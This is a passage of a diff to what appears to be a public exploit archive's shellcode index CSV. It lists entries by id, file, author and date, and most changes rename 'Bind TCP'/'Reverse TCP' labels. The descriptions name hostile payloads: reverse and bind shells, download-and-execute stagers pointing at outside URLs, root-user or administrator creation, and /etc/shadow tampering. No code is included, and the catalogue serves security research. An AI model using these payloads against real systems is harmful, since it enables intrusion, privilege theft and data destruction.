Nyberg",shellcode,solaris_sparc -13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc -13497,shellcodes/solaris_sparc/13497.c,"Solaris/SPARC - Bind TCP Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc -13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator +13495,shellcodes/solaris_sparc/13495.c,"Solaris/SPARC - Bind (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc +13496,shellcodes/solaris_sparc/13496.c,"Solaris/SPARC - Reverse (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,solaris_sparc +13497,shellcodes/solaris_sparc/13497.c,"Solaris/SPARC - Bind (/TCP) Shell Shellcode (240 bytes)",2000-11-19,dopesquad.net,shellcode,solaris_sparc +13498,shellcodes/generator/13498.php,"Solaris/x86 - Bind (/TCP) Shell Shellcode (Generator)",2009-06-16,"Jonathan Salwan",shellcode,generator 13499,shellcodes/solaris_x86/13499.c,"Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 13500,shellcodes/solaris_x86/13500.c,"Solaris/x86 - setuid(0) + execve(/bin/cat_ /etc/shadow) + exit(0) Shellcode (59 bytes)",2008-12-02,sm4x,shellcode,solaris_x86 13501,shellcodes/solaris_x86/13501.c,"Solaris/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 13502,shellcodes/solaris_x86/13502.c,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86 13503,shellcodes/unixware/13503.c,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware -13504,shellcodes/windows_x86/13504.asm,"Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86 +13504,shellcodes/windows_x86/13504.asm,"Windows/x86 (5.0 < 7.0) - Bind (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86 13505,shellcodes/windows_x86/13505.c,"Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86 13507,shellcodes/windows_x86/13507.txt,"Windows/x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86 13508,shellcodes/windows_x86/13508.asm,"Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,windows_x86 @@ -268,7 +268,7 @@ id,file,description,date,author,type,platform 13511,shellcodes/windows_x86/13511.c,"Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86 13512,shellcodes/windows_x86/13512.c,"Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86 13513,shellcodes/windows_x86/13513.c,"Windows/x86 - PEB 'Kernel32.dll' ImageBase Finder + ASCII Printable Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86 -13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse TCP + Download File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86 +13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse (/TCP) + Download File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86 13515,shellcodes/generator/13515.pl,"Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator 13516,shellcodes/windows_x86/13516.asm,"Windows/x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86 13517,shellcodes/windows_x86/13517.asm,"Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86 @@ -282,10 +282,10 @@ id,file,description,date,author,type,platform 13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86 13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86 13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86 -13528,shellcodes/generator/13528.c,"Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator +13528,shellcodes/generator/13528.c,"Windows (XP/2000/2003) - Reverse (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator 13529,shellcodes/windows_x86/13529.c,"Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,windows_x86 13530,shellcodes/windows_x86/13530.asm,"Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86 -13531,shellcodes/windows_x86/13531.c,"Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86 +13531,shellcodes/windows_x86/13531.c,"Windows (XP SP1) - Bind (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86 13532,shellcodes/windows_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,windows_x86 13533,shellcodes/windows_x86-64/13533.asm,"Windows/x64 - URLDownloadToFileA(http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64 13548,shellcodes/linux_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,linux_x86 @@ -298,7 +298,7 @@ id,file,description,date,author,type,platform 13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA() Shellcode",2009-12-19,sinn3r,shellcode,windows_x86 13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86 13569,shellcodes/windows_x86/13569.asm,"Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode",2009-12-24,sinn3r,shellcode,windows_x86 -13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86 +13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86 13571,shellcodes/windows_x86/13571.c,"Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86 13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,$andman,shellcode,linux_x86 13574,shellcodes/windows_x86/13574.c,"Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86 @@ -330,7 +330,7 @@ id,file,description,date,author,type,platform 13647,shellcodes/windows_x86/13647.txt,"Windows/x86 (XP SP3) (Russia) - WinExec(cmd.exe) + ExitProcess Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86 13648,shellcodes/windows_x86/13648.rb,"Windows/x86 - MessageBox Shellcode (Generator) (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86 13649,shellcodes/windows/13649.as,"Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows -13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86 +13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86 13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 13671,shellcodes/linux_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86 @@ -371,11 +371,11 @@ id,file,description,date,author,type,platform 13733,shellcodes/solaris/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",shellcode,solaris 13742,shellcodes/linux_x86/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86 13743,shellcodes/linux_x86/13743.c,"Linux/x86 - Give All Users Root Access When Executing /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,shellcode,linux_x86 -14334,shellcodes/linux_x86/14334.c,"Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes)",2010-07-11,blake,shellcode,linux_x86 +14334,shellcodes/linux_x86/14334.c,"Linux/x86 - Reverse (8080/TCP) Netcat Shell Shellcode (76 bytes)",2010-07-11,blake,shellcode,linux_x86 13828,shellcodes/windows/13828.c,"Windows - MessageBoxA() Shellcode (238 bytes)",2010-06-11,RubberDuck,shellcode,windows 13875,shellcodes/solaris_x86/13875.c,"Solaris/x86 - Sync() + reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",shellcode,solaris_x86 13908,shellcodes/linux_x86-64/13908.c,"Linux/x64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64 -13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86 +13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86 13915,shellcodes/linux_x86-64/13915.c,"Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64 13943,shellcodes/linux_x86-64/13943.c,"Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64 14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator @@ -387,20 +387,20 @@ id,file,description,date,author,type,platform 14122,shellcodes/arm/14122.c,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm 14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm 14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm -14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86 +14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86 14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux 14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux 14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows -14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86 -14235,shellcodes/linux_x86/14235.c,"Linux/x86 - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86 +14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86 +14235,shellcodes/linux_x86/14235.c,"Linux/x86 - Bind (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86 14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator 14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86 14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86 14305,shellcodes/linux_x86-64/14305.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64 -14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86 +14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86 14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86 14697,shellcodes/windows/14697.c,"Windows (XP SP3) (English) - MessageBoxA() Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows -14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86 +14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86 14873,shellcodes/windows_x86/14873.asm,"Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-01,dijital1,shellcode,windows_x86 14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm 15063,shellcodes/windows_x86/15063.c,"Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86 @@ -408,69 +408,69 @@ id,file,description,date,author,type,platform 15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows 15202,shellcodes/windows_x86/15202.c,"Windows/x86 (XP Professional SP3) (English) - Add Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86 15203,shellcodes/windows_x86/15203.c,"Windows/x86 - Add Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86 -15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm -15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm -15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm +15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind (0x1337/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm +15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind (68/UDP) Listener + Reverse (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm +15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm 15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm 15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm 15618,shellcodes/osx/15618.c,"OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx 15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (66+ bytes) (Generator) (Metasploit)",2010-12-09,"Jonathan Salwan",shellcode,generator 15879,shellcodes/windows_x86/15879.txt,"Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86 -16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator -16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86 +16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator +16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86 16283,shellcodes/windows_x86/16283.asm,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86 17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4 -17194,shellcodes/linux_x86/17194.c,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86 -17224,shellcodes/osx/17224.s,"OSX/x64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx +17194,shellcodes/linux_x86/17194.c,"Linux/x86 - Bind (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86 +17224,shellcodes/osx/17224.s,"OSX/x64 - Reverse (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx 17323,shellcodes/windows/17323.c,"Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows 20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86 17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator -17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86 +17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86 17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4 17545,shellcodes/windows_x86/17545.c,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86 17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86 -17564,shellcodes/osx/17564.asm,"OSX/x64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx +17564,shellcodes/osx/17564.asm,"OSX/x64 - Universal ROP + Reverse (/TCP) Shell Shellcode",2011-07-24,pa_kt,shellcode,osx 17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips 17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator 18154,shellcodes/superh_sh4/18154.c,"Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,superh_sh4 18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips 18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips 18197,shellcodes/linux_x86-64/18197.c,"Linux/x64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64 -18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips +18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips 18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips 18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86 18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86 18585,shellcodes/linux_x86-64/18585.s,"Linux/x64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64 18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86 20196,shellcodes/linux_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86 -21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm +21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm 21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm 21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm -40363,shellcodes/windows_x86/40363.c,"Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86 +40363,shellcodes/windows_x86/40363.c,"Windows/x86 - Bind (/TCP) Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86 22489,shellcodes/windows/22489.cpp,"Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows -40890,shellcodes/windows_x86-64/40890.c,"Windows/x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +40890,shellcodes/windows_x86-64/40890.c,"Windows/x64 - Bind (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 23622,shellcodes/linux_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,linux_x86 24318,shellcodes/windows/24318.c,"Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows -25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86 +25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86 40387,shellcodes/hardware/40387.nasm,"Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware 27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips -27180,shellcodes/arm/27180.asm,"Windows/ARM (RT) - Bind TCP (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm +27180,shellcodes/arm/27180.asm,"Windows/ARM (RT) - Bind (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm 40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86 -28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86 -40334,shellcodes/windows_x86/40334.c,"Windows/x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86 +28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86 +40334,shellcodes/windows_x86/40334.c,"Windows/x86 - Reverse (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86 28996,shellcodes/windows/28996.c,"Windows - MessageBox + Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows -29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips -40352,shellcodes/windows_x86/40352.c,"Windows/x86 (7) - Bind TCP 